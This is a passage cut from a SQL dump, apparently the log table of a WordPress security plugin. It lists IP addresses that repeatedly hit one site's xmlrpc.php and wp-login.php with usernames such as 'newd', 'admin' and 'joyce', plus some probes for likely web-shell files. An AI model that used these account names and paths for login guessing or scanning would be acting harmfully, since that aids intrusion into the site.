0|0|0|cteisys.com/100.php',0,19,0),('20.118.129.10',343310602,'',0,1665249007.4914,55,'XD9noJ5LVbep8aq4MNRsdhQG','','19|0|0|0|cteisys.com/1.php',0,19,0),('20.118.129.10',343310602,'',0,1665249000.7457,55,'MAvODWxQb1gijsRPznEFKhHf','','19|0|0|0|cteisys.com/0byte.php',0,19,0),('194.233.89.214',3270072790,'newd',0,1665264840.7169,152,'dbyfG7t4ljEvK1r2RJx8mpSA','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('171.244.0.91',2884894811,'newd',0,1665254412.2592,7,'Rrf6noFdcPMlByZaTpsEGgN1','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('128.127.104.80',2155833424,'joyce',0,1665254147.5567,152,'8wZfmHe0B5NSsdutQDEliLjp','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('209.141.36.190',3515688126,'newd',0,1665253672.9783,152,'QRtKWLanPXAysFkqTp89zC6j','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('54.38.73.235',908478955,'newd',0,1665252434.0018,7,'HJeAzRb7saDiBhGClZVTE5x2','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('142.93.201.0',2388510976,'newd',0,1665264163.7129,7,'BmkAhsSyD8r3IZoQCiXY70UK','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('123.56.59.9',2067282697,'newd',0,1665263864.3201,152,'B1nTp9YegLDmFVIUbk8HAuzR','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('8.218.143.243',148541427,'newd',0,1665262396.9607,152,'ig5czABR8YsWNr70jbPVqJ6Q','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('173.236.152.148',2917963924,'newd',0,1665262197.1643,7,'lSMnimd1xsIvWkGzufe7V3RA','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('75.119.135.205',1266124749,'newd',0,1665258326.6332,7,'Vn0QgCTRbX5Wp69HoBDechmJ','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('64.90.36.102',1079649382,'newd',0,1665256396.0019,7,'xEoOZuUvY0spNwDGB42K8b3l','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('103.221.220.140',1742593164,'newd',0,1665261955.9395,152,'Fbaket7WvL6YJZgVBp9oGsd4','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('125.227.127.195',2112061379,'newd',0,1665261941.3779,152,'AgPn1R6txu2ysSDIoVQ7HcaE','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('167.99.78.164',2808303268,'admin',0,1665261510.3417,152,'ygtSvXCpj4wEH2hd70VuesZF','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('104.219.251.247',1759247351,'admin',0,1665261510.3131,152,'Z6FCNo0pmYjhDiK3uHdgt9kB','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('87.107.144.155',1466667163,'admin',0,1665261105.6495,152,'JaZXciWOGDNmBQsHnSbdREPY','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('72.34.62.119',1210203767,'admin',0,1665261078.1148,152,'yUIOnM60WZPl3SRJq5fsKoBh','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('20.150.138.78',345410126,'newd',0,1665260901.6378,152,'tjDQT65nCVw0vBp9KqSdlHNF','','0|0|0|0|cteisys.com//xmlrpc.php',0,0,0),('178.162.204.214',2997013718,'joyce',0,1665260869.7357,152,'zQ6S49wUn3NYgcTLM0VXiCr8','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('49.12.209.135',822923655,'newd',0,1665260251.6636,7,'cKl08CD3R2PTLx6gBuph14dw','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('111.90.150.36',1868207652,'newd',0,1665263840.6224,152,'ejGDkwE8lV3Si9mrAbRdWvxY','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('184.168.125.241',3098050033,'newd',0,1665263352.7312,152,'VGbxzPHhE5IdAuji4cYB9Trg','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('216.158.230.167',3634292391,'newd',0,1665263352.1819,152,'2rbjHv0uwVfKNBdAY54FioLc','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('87.107.144.155',1466667163,'newd',0,1665262942.2280,152,'ikFvZ8sbOjPGardxRSz0JhVf','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('51.159.57.26',866072858,'newd',0,1665262854.5716,152,'bzHSfDLQ7a2tlYINwoPEjyuq','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('103.254.12.61',1744702525,'newd',0,1665267507.3248,152,'7bMZuEX4kjFVz9TKoHnJvAwr','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('192.99.34.140',3227722380,'newd',0,1665267507.3248,152,'rlWhkdEARxepKc9QT5zH0uMa','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('103.27.238.234',1729883882,'newd',0,1665266982.0176,152,'PLz4kRQciNnCpM9u07oa2Dbl','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('15.235.168.187',267102395,'newd',0,1665266982.0063,152,'IuqbQCo8y9vXPGBscJz0RZ31','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('109.233.192.83',1844035667,'newd',0,1665266445.5243,152,'PbqlHXW8hfMT6w09moBGukQz','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('194.163.132.194',3265496258,'newd',0,1665266431.8685,152,'JaK9SZyFgQWGUB3Erv4mi6jM','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('124.158.12.149',2090732693,'newd',0,1665271995.5883,152,'eqpMXW5FuQlY3RajE6Otizms','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('190.171.170.94',3198921310,'newd',0,1665271420.4075,152,'QrGaZ0NVYBzksiMKt3OLpTuc','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('111.90.150.28',1868207644,'newd',0,1665271401.3686,152,'rcsIqAECOY0gvJkNn72Uoeh9','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('157.0.140.186',2634058938,'newd',0,1665270846.7199,152,'oiBpmAC3ej4gwaHySnUETv2t','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('103.154.177.165',1738191269,'newd',0,1665270846.7076,152,'ZSG8nio5TDXpa6kvAYF09glB','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('109.234.161.93',1844093277,'newd',0,1665270310.5425,152,'7XTtmhasFcN9A0OgRJGUyCSv','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('188.166.236.35',3165056035,'newd',0,1665270090.4317,7,'DjIWyEFAiC28J5Hvu3BocpsU','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('62.90.101.113',1046111601,'newd',0,1665275586.3013,152,'WwIa1Qv3uSV7lELzrPD6iGTM','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('35.194.233.240',599976432,'newd',0,1665274958.7037,152,'dkoqJUglSTmAvehZf6xEr9i4','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('67.222.131.158',1138656158,'newd',0,1665274958.7018,152,'SbIBF5dNmjT1UEfDRZ0Y83Jz','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('51.210.99.98',869426018,'newd',0,1665274374.7355,152,'rKYexCXPTdGtOqkH3wlbWZ8n','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('188.166.236.35',3165056035,'newd',0,1665274075.2628,7,'dzLVE4smryWKloSQ7xDC2g1T','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('185.252.31.179',3120308147,'newd',0,1665273808.1681,152,'plP16mw3BjCcOV9edygt20WM','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('103.145.51.200',1737569224,'newd',0,1665278100.5134,152,'1oKscuXJqa59hfB7nlkTDWSN','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('208.113.171.103',3497110375,'newd',0,1665278099.3060,7,'mthW9vcPB2TnC0iOSuEdLK74','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('180.149.241.246',3029725686,'newd',0,1665277449.6627,152,'jZOxlFd96LtKo4c2W7aUmbBu','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('103.90.232.106',1734010986,'newd',0,1665277387.0831,152,'7mqoBQUzROC6jXaGkPSKZ3py','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('180.149.241.246',3029725686,'newd',0,1665281895.6002,152,'ohXBuZrM0lcDksfWUm8PFKEQ','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('87.248.153.52',1475909940,'newd',0,1665281252.4631,152,'gZ7WKzAPYcQV5pFyUs6ulO8f','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('185.252.31.59',3120308027,'newd',0,1665287716.9396,152,'JK8hZBWQqsd0UyjTw3MXRkIH','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('20.109.101.102',342713702,'newd',0,1665287035.8929,152,'32u0XjlH84av9SOzQJRKBkZ1','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('162.241.120.248',2733734136,'newd',0,1665287017.5081,152,'ImSjqN4RLnxs1VzMPCrl5UaX','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('103.35.64.73',1730363465,'newd',0,1665286335.2829,152,'vRYoyxMKfCcuhpLUEDjOW4G5','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('208.109.39.235',3496814571,'newd',0,1665285696.3619,152,'UXsOxnfd68TEbJ9gGFKqzwSp','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('216.245.215.122',3639990138,'newd',0,1665285055.9764,152,'EBFHblIPc8uptG59dTSLQYvw','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('67.205.143.236',1137545196,'newd',0,1665285049.5239,152,'pWTOBVke4gDwjHumAtdrzyqF','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('67.205.143.236',1137545196,'newd',0,1665290983.3841,152,'7EOaCQsqD6KN8SGuJjPWbYfx','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('39.107.137.177',661359025,'newd',0,1665290361.1111,152,'3SljrcImLVRKnZfBsFqN741U','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('194.44.53.72',3257677128,'newd',0,1665290289.9545,152,'3woYEsH8VK2rjFTxudW4qRJe','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('138.68.140.0',2319748096,'newd',0,1665290236.5443,7,'Azonc0LB2Xqs7HSmEkFC5Vya','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('47.106.201.134',795527558,'newd',0,1665289655.8125,152,'HphweJOdQqkfM18Biny25jLY','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('3.34.104.242',52586738,'newd',0,1665289646.4999,152,'4k0YSBd1puWPtQ9jXzGvnRrK','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('107.189.6.184',1807550136,'newd',0,1665289368.7873,152,'dPz9msZyvj5pGVlEH4krBM7K','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('111.90.150.28',1868207644,'newd',0,1665288987.2327,152,'A4HJQeTLgKWVbo0wuX9GOz3i','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('209.145.54.196',3515954884,'newd',0,1665288349.1564,152,'tMAFm4UcVGZ7bSzHrWxfJeEv','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('171.244.16.103',2884898919,'newd',0,1665288312.6690,152,'xPJDU2ftXZen0MhcB1GSvYCq','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('77.39.212.31',1294455839,'newd',0,1665288185.2707,7,'ZdrWbzTOFxLDGp3cgljSPwUu','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('87.248.153.52',1475909940,'newd',0,1665294972.2771,152,'rLjb6EyT31mseYv0NW4tDhop','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('54.37.74.123',908413563,'newd',0,1665294972.2762,152,'PvWbJr4G9gkx3pAhEF2mXzCI','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('15.235.168.187',267102395,'newd',0,1665294309.9563,152,'HjCdz1T2qkMAEXr6shiuYl4v','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('159.69.8.8',2672101384,'newd',0,1665294300.5258,7,'IVLE4leN3J6nW9ZTMgs87Bxb','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('103.145.50.127',1737568895,'newd',0,1665294281.1711,152,'y4cFiqewRY2dhXnJgGtO0C5P','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('192.99.34.140',3227722380,'newd',0,1665293636.5585,152,'Uy3pTMLIk8x0c5v4qWYhQ2gA','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('8.218.143.243',148541427,'newd',0,1665292958.4683,152,'pxEt7WzsOCMFlZLPJ3KQ5wVf','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('47.106.201.134',795527558,'newd',0,1665292950.2551,152,'pg7myEV1srtn46GacbIeqd9B','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('103.116.16.173',1735659693,'newd',0,1665292299.3660,152,'azKYDv0LlWopR3H9wENsX1uc','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('148.72.211.177',2487800753,'newd',0,1665292278.5169,152,'ke46Lb5aEUmBWHZtvKfF8DGM','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('185.2.5.31',3103917343,'newd',0,1665292277.7672,7,'7wQa1FJ4b0RPBGsrEKg2dj9t','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('159.65.149.229',2671875557,'newd',0,1665291670.3793,152,'TYus3j2lLR504QfHMwXEgGCW','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('49.128.186.91',830519899,'newd',0,1665291611.3396,152,'iWV2P8xymNYpGXcUoOCJ3Lz6','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('13.234.117.78',233469262,'newd',0,1665298616.9820,152,'ChAS0qe2om4apIwLv16zfn38','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('198.12.254.32',3322740256,'newd',0,1665298616.2807,152,'bkjve486QO9LsIESpVHAo1FX','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('159.65.200.228',2671888612,'newd',0,1665298340.5105,7,'Yma75uHxwbE21AlcIgQfp3dN','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('178.62.110.145',2990435985,'newd',0,1665298297.1777,152,'SlMCV6pcGt1RXEoKgYJN4DHw','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('74.208.103.228',1255172068,'newd',0,1665297986.7857,152,'vy35dT4UrKjqHQi6zaIVLN7X','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('104.248.241.28',1761145116,'newd',0,1665297985.5029,152,'EVXP3Fjz52mxrOBpeW6GvodN','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('81.95.96.180',1365205172,'newd',0,1665297693.7552,152,'NROAxlYzQELF25VypaPdhS41','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('81.88.53.17',1364735249,'newd',0,1665297693.7319,152,'MDu9zJBhla4GnF27we56pWYf','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('41.93.82.7',693981703,'admin',0,1665297362.3346,152,'TdAS6kHjrxDVYNJvbOzRBmqZ','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('107.189.14.89',1807552089,'newd',0,1665297231.0113,152,'tcs7plvRyijAXWNmdBUP03aI','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('69.89.27.23',1163467543,'admin',0,1665297050.5511,152,'SQLqwTEzN17PGWjXtobplRn9','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('194.233.69.10',3270067466,'admin',0,1665297024.6436,152,'dyEs0gHeDraoBi6UcvjIht1Y','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('119.18.49.12',1997680908,'newd',0,1665296365.0381,152,'4r2IJFgnLa70l1DvqucmXB9Z','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('75.119.157.181',1266130357,'newd',0,1665296337.6342,7,'l39eaHuTJFBjnGPg8IZtvs6O','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('13.237.121.70',233666886,'newd',0,1665295912.3648,152,'hSUlFV6YkjIZNfvE4bBaqKs5','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('69.89.27.23',1163467543,'newd',0,1665295911.8597,152,'VqxRCc3vpB7YFSamsrnJGHN0','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('193.176.230.188',3249596092,'newd',0,1665295475.1689,152,'AbPx8q6R1jHYdryWk2uKGiop','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('143.110.137.82',2406386002,'newd',0,1665295475.1676,152,'4BZRukXDp2mvFjxlo953JiQr','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('143.244.162.250',2415174394,'newd',0,1665305935.3964,152,'nXoPZpfLOlv5ckisMHj0xKwd','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('72.29.76.78',1209879630,'newd',0,1665305935.3267,152,'pjLWVcyiG5TrnbXEQfsvZ9oC','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('167.172.79.125',2813087613,'newd',0,1665302208.5428,152,'XS8HxgZNRGkanmEhPt3irLod','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('164.92.66.133',2757509765,'newd',0,1665301927.5007,152,'5csAekZIEia4QXKdWMn0OzBr','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('190.107.177.243',3194728947,'newd',0,1665301643.0863,152,'u7JHpLs6SNGOef2oCYPMmQFX','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('107.180.103.185',1806985145,'newd',0,1665301642.5269,152,'GwUc9tj5vmBCqShLD4lzPH0i','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('80.77.135.125',1347258237,'newd',0,1665301138.8701,152,'yDC70sIogwmYSM2bx3HPdflj','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('184.168.121.5',3098048773,'newd',0,1665301138.8698,152,'JMgA7Ejmnwfu1Z3ysP4ohLtb','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('101.99.90.175',1701010095,'newd',0,1665300823.7988,152,'XZzCVcG45k6fFKoehd37EtO8','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('104.248.241.28',1761145116,'newd',0,1665300811.1752,152,'j9Z8YCt1V6dzovLe5ERhJ0HO','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('118.98.64.188',1986150588,'newd',0,1665300499.9386,152,'Uz3MYbvmurA6LDQSswft9IOo','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('159.89.164.128',2673452160,'newd',0,1665300372.8438,7,'m4Te8bgFN1IYSlMuKoL9sVxE','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('23.175.146.178',397382322,'newd',0,1665300222.3788,152,'knvRM6AFgwyIfZJpe3KUPqV9','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('171.244.16.103',2884898919,'newd',0,1665300200.5197,152,'VmJvR7ehNOL4lydxjb5BIG9u','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('40.70.241.53',675737909,'newd',0,1665299908.2227,152,'6uqUgNrOAecSvwPF5jdb1hsB','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('162.14.71.142',2718844814,'newd',0,1665299561.4868,152,'2X0IQL3AchfBxvJwVUto6NCG','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('104.45.41.45',1747790125,'newd',0,1665299226.1674,152,'5PJMWarTO8G0qmfR3zdly2SA','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('103.152.164.103',1738056807,'newd',0,1665299225.4185,152,'OwdaSE2bWgP6FnBxCHe58fQR','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('213.152.162.10',3583549962,'joyce',0,1665299084.2350,152,'oGfDysYq3dSIVXAcelxkUTwh','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('31.184.242.14',532214286,'newd',0,1665298921.8502,152,'eVQ9vxkHI8bAaoMfYrGnXP26','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('177.52.160.29',2973016093,'newd',0,1665298921.1953,152,'qGWElgrMTo9AdNV0h7CDiZFQ','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('51.210.99.98',869426018,'newd',0,1665305594.1131,152,'8qnWLOwPl6E2GjASxsp3KcC1','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('158.255.80.210',2667532498,'newd',0,1665305584.5525,152,'mJ9K4bct1wrDRdPOlnM2qkYu','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('157.0.140.186',2634058938,'newd',0,1665305258.8287,152,'GQaS7ZUNhW6Fzp1nOwvbEIji','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('47.57.186.73',792312393,'newd',0,1665305248.1509,152,'uWZsVO6PrcqT2pD8C0UijgRk','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('124.158.12.83',2090732627,'newd',0,1665304934.2909,152,'FDOKZRHqmok0vrlWIx3yhtLz','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('95.111.225.89',1601167705,'newd',0,1665304620.8899,152,'Id896rY5C02vmPpbJO34GNfx','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('50.87.248.38',844625958,'newd',0,1665304620.7917,152,'FV0KtzLUa5WsoSnl6h9i48Hp','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('47.111.116.44',795833388,'newd',0,1665304351.1304,7,'6X9F1VamJGCdrcketAfQSbD2','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('151.106.35.235',2540315627,'newd',0,1665304312.9700,152,'GlxDs3tAi6SZy25hUrYkRnPV','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('213.152.161.244',3583549940,'Joyce',0,1665304125.2248,152,'xdSjOsI5YhBJUWy837Fcno1E','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('68.183.15.215',1152847831,'newd',0,1665303998.1149,152,'VTDIPg0ulQshJGp6edjXN3oS','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('172.105.42.19',2892573203,'newd',0,1665303998.1149,152,'CkU6QSciW2TjRKYLeXp34ghB','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('167.71.63.47',2806464303,'newd',0,1665303688.6256,152,'qlUtWKfpiOXDkSeE24sPQNLr','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('177.52.160.29',2973016093,'newd',0,1665303675.9239,152,'YMPfwhXNxKV5mBzG4cQi81Ij','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('194.242.56.232',3270654184,'newd',0,1665303393.4320,152,'jVNirak9Zhyn30JgvdEtwTlz','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('118.98.64.188',1986150588,'newd',0,1665303393.4188,152,'1KVmrwzEl7s6BS0GH5Q2U8De','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('66.94.117.33',1113486625,'newd',0,1665303101.3071,152,'FxG63JSX0jOgowZrzkeu7LvQ','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('116.62.49.96',1950232928,'newd',0,1665303101.2585,152,'jKEtHr3aTm0nsYdolV46I7FG','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('159.65.219.142',2671893390,'newd',0,1665302818.0911,152,'v43eGmF5ukPyxhLWlAsMz1a2','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('158.69.26.40',2655328808,'newd',0,1665302817.9609,152,'jNiZRJkMwoe8SOPuYd6bDgq7','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('130.61.143.194',2185072578,'newd',0,1665302538.6006,152,'4txMLuWvXbN0IYeiT5Hf7nrO','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('109.233.192.83',1844035667,'newd',0,1665309591.6913,152,'qTG15MxysreuYknEazljB7Xm','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('178.128.209.28',2994786588,'newd',0,1665309591.5553,152,'HgUrd0WBbCtMLm7ojZfk2exS','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('131.72.236.73',2202594377,'newd',0,1665309195.0820,152,'gkISLQmMJzp9d7V3sj8hXYAe','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('207.55.255.20',3476553492,'newd',0,1665309193.8649,152,'fNG6vFYXDVWgR4iCAQM3ZyjU','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('64.42.179.43',1076540203,'joyce',0,1665308821.8292,152,'vHizFNTGS5bMe3uYmXnLK2Vo','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('64.235.231.20',1089201940,'newd',0,1665308479.4066,152,'13xfGOac2yNDM86CLEePpSWQ','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('216.245.215.122',3639990138,'newd',0,1665308452.3712,152,'qTimPDuEFknYb6lrvtheQI2W','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('94.231.86.20',1592219156,'newd',0,1665308299.9384,7,'U0o5cHWnExT4FyYBLjVN2wqA','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('217.174.248.107',3652122731,'newd',0,1665308081.2293,152,'nX0Tj8BSCMLqcmwNKtHW5sdl','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('199.188.207.230',3351039974,'newd',0,1665308081.2261,152,'fGgWwYiks20NJlDobn1QjT8x','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('167.172.79.125',2813087613,'newd',0,1665307709.7357,152,'7Aj3qWX6TH50RuavhcrxJSFP','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('194.59.165.88',3258688856,'newd',0,1665307709.7357,152,'ejfETHC3i5Nh1nXSZQsOU97u','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('139.59.117.30',2335929630,'newd',0,1665307348.1876,152,'Bnb76J0uKOq9GF4iVpySQ8Ic','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('178.128.209.28',2994786588,'newd',0,1665307348.1070,152,'OoL0VEBR2eTq3tgDNcupWyP9','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('143.198.161.19',2412159251,'newd',0,1665306992.2123,152,'VwqhtuYryn4I5M2gW0jQOFR8','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('165.232.183.66',2783491906,'newd',0,1665306989.3245,152,'bsYaivCKkzZuS8D3OftwF1jR','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('162.241.115.107',2733732715,'newd',0,1665306641.6469,152,'B1PH5Ct8FEz2lZXbuyqRJQdI','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('167.99.54.31',2808296991,'newd',0,1665306641.6323,152,'MKuisAj2nB6aeX7fE81vbcYG','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('81.68.87.46',1363433262,'newd',0,1665306280.2765,152,'5HwgR4sTxrkqodzXbI3Ku7Ml','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('103.8.25.74',1728584010,'newd',0,1665313492.7655,152,'3pEH1nJP4jL7TGBiMrdcDzUm','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('110.40.244.196',1848177860,'admin',0,1665313191.1121,51,'K29ZlsgDBwyzG1xfcbO4SPXT','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('74.208.103.228',1255172068,'newd',0,1665313099.0947,152,'AGTzFY7dy82rwLjRcP3fnSvk','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('165.232.183.66',2783491906,'newd',0,1665312700.4386,152,'zc8L47kbsm6KSDtTWVpJM2OY','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('72.34.62.119',1210203767,'newd',0,1665312681.2002,152,'gICW87NpUvFOyKZea2dxP149','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('31.172.80.147',531386515,'newd',0,1665312330.4357,152,'nbtDYLaRrhyAFKXv2s9WSoTC','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('40.70.241.53',675737909,'newd',0,1665312320.4697,152,'L5x09Eb1DBtcvQS4so8TCk2w','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('103.92.27.198',1734089670,'newd',0,1665311894.5390,152,'NVmKr94zEc2SCZIGtDnwlavs','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('51.210.99.98',869426018,'newd',0,1665311537.3524,152,'GzAy3NV4hcs9UiPIbR0KH1EX','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('34.65.234.0',574745088,'admin',0,1665311177.2626,51,'mELqfKAg4ld1ZiIvtoFJ9ku5','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('120.24.52.65',2014852161,'newd',0,1665311135.9036,152,'aVdiJxUT3eynoEWDj9hCkQbm','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('38.242.221.235',653450731,'newd',0,1665311134.9999,152,'wpxdf5VXacjyLHz2In6mtqe1','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('137.184.209.117',2310590837,'newd',0,1665310762.7336,152,'HgDScLyOm1odU0hENiQkjCeG','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('35.211.94.153',601054873,'newd',0,1665310762.7317,152,'yxNv2dzaute8